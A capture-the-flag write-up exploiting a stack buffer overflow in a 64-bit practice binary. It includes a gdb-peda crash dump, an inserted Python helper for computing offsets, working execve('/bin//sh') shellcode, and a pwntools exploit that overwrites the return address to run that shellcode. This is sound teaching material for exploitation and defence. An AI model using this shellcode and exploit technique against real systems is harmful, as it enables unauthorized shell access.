sniperoj-pwn100-shellcode-x86-64

Challenge: sniperoj-pwn100-shellcode-x86-64

1. Basic information gathering

Check the file type:

file shellcode
shellcode: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=4600df3dbafbffc6436a38e95b386fc8afbbd63b, not stripped

Check the protections:

r2sc1.png

Disassembly in IDA:

r2sc2.png

2. Locating and analysing the vulnerability

From the figure above, the read can overwrite 0x40 bytes, while buf is only 0x10 bytes.

No system function or "/bin/sh" string was found in the binary, and non-executable stack protection (NX) is not enabled, so we can write shellcode onto the stack directly.

Because:

r2sc3.png

the shellcode we normally use is too long, so a shorter one is needed.

Two sites where shellcode can be found:

https://www.exploit-db.com/shellcodes
http://shell-storm.org/shellcode/

The shellcode used for this challenge was found here: https://www.exploit-db.com/shellcodes/46907

shellcode = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

Next we have to decide where to put the shellcode. With the usual stack-pointer hijacking approach, since space is limited, the shellcode would go at the very start of buf and control flow would be redirected to it. That does not work for this challenge, for the reason shown in the figure below:

r2sc4.png

leave is equivalent to MOV SP,BP; POP BP.

r2sc6.png

Since the shellcode itself pushes onto the stack, the leave instruction (which moves the stack pointer right next to buf) would interfere with the shellcode's execution. Therefore the shellcode cannot be placed in buf, nor in the 8 bytes after it (that area has to hold the return address).

So our shellcode can only go at an address beyond buf + 0x10 + 8.

3. Exploitation steps

The standard stack-overflow routine is as follows:

1. Compute the offset

gdb-peda$ pattern create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /home/hc/study/pwn/stackoverflow/Ret2shellcode/sniperoj-pwn100-shellcode-x86-64/shellcode
Welcome to Sniperoj!
Do your kown what is it : [0x7fffffffdbb0] ?
Now give me your answer :
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7af4081 (<__GI___libc_read+17>: cmp rax,0xfffffffffffff000)
RDX: 0x40 ('@')
RSI: 0x7fffffffdbb0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
RDI: 0x0
RBP: 0x41412d4141434141 ('AACAA-AA')
RSP: 0x7fffffffdbc8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
RIP: 0x555555554852 (<main+130>: ret)
R8 : 0x7ffff7fdf4c0 (0x00007ffff7fdf4c0)
R9 : 0x0
R10: 0x3
R11: 0x246
R12: 0x5555555546a0 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdca0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x555555554847 <main+119>: call 0x555555554670 <read@plt>
0x55555555484c <main+124>: mov eax,0x0
0x555555554851 <main+129>: leave
=> 0x555555554852 <main+130>: ret
0x555555554853: nop WORD PTR cs:[rax+rax*1+0x0]
0x55555555485d: nop DWORD PTR [rax]
0x555555554860 <__libc_csu_init>: push r15
0x555555554862 <__libc_csu_init+2>: push r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdbc8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
0008| 0x7fffffffdbd0 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
0016| 0x7fffffffdbd8 ("AA0AAFAAbAA1AAGAAcAA2AAH")
0024| 0x7fffffffdbe0 ("bAA1AAGAAcAA2AAH")
0032| 0x7fffffffdbe8 ("AcAA2AAH")
0040| 0x7fffffffdbf0 --> 0x0
0048| 0x7fffffffdbf8 --> 0x7f5085ea1bc1eb88
0056| 0x7fffffffdc00 --> 0x5555555546a0 (<_start>: xor ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000555555554852 in main ()
gdb-peda$ pattern offset (AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH
(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH found at offset: 24
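The offset step above and the layout the exploit relies on, as an added example that is not part of the original write-up and not peda's own code: a Python reimplementation of peda's extended `pattern create` / `pattern offset` (charset construction and de Bruijn ordering assumed from peda's source), plus a helper named `ret2shellcode_layout` (my name) that checks that padding, return address and shellcode fit inside the 0x40-byte read.

```python
import string

def peda_charset():
    # peda's extended "pattern create" charset (assumed from peda's source):
    # uppercase; lowercase with s/n swapped for "%$-;"; digits behind "sn()";
    # the three sets are interleaved one character at a time.
    upper = string.ascii_uppercase
    lower = "%$-;" + string.ascii_lowercase.replace("s", "").replace("n", "")
    digits = "sn()" + string.digits
    mixed = ""
    for k in range(max(len(upper), len(lower), len(digits))):
        for cs in (upper, lower, digits):
            mixed += cs[k:k + 1]  # empty slice once a set is exhausted
    return mixed

def de_bruijn(alphabet, n, maxlen):
    # First maxlen symbols of the de Bruijn sequence (Lyndon words in lexicographic
    # order): every n-character window is unique, so an offset lookup is unambiguous.
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []
    def db(t, p):
        if len(seq) >= maxlen:
            return  # enough output, stop early
        if t > n:
            if n % p == 0:
                seq.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return "".join(seq[:maxlen])

def pattern_create(size):
    return de_bruijn(peda_charset(), 3, size)

def pattern_offset(needle, size=100):
    # needle: the string found at RSP, or an int register value read little-endian
    # (e.g. the RBP from the crash dump gives the offset of the saved rbp).
    if isinstance(needle, int):
        needle = needle.to_bytes(8, "little").decode()
    return pattern_create(size).find(needle)

def ret2shellcode_layout(buf_addr, ret_offset, shellcode_len, read_size):
    # Layout used in this write-up: padding up to the return address, the address
    # of the bytes right after it, then the shellcode; it must fit the read size.
    total = ret_offset + 8 + shellcode_len
    if total > read_size:
        raise ValueError("payload %d bytes exceeds %d-byte read" % (total, read_size))
    return buf_addr + ret_offset + 8, total
```

With the values from the crash dump, the RBP string gives offset 16 and the RSP string offset 24, which is the 0x10-byte buf plus the 8-byte saved rbp.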

2. Write the exploit

from pwn import *

p = process('./shellcode')

# 23-byte execve("/bin//sh") shellcode from exploit-db 46907
shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'

# The program prints the address of buf between '[' and ']'
p.recvuntil(b'[')
buf_addr = int(p.recvuntil(b']', drop=True), 16)
p.recv()

# 24 bytes of padding (0x10 buf + 8 saved rbp), a return address pointing
# just past itself (buf + 32), then the shellcode
payload = b'A' * 24 + p64(buf_addr + 32) + shellcode

p.sendline(payload)
p.interactive()

r2sc5.png
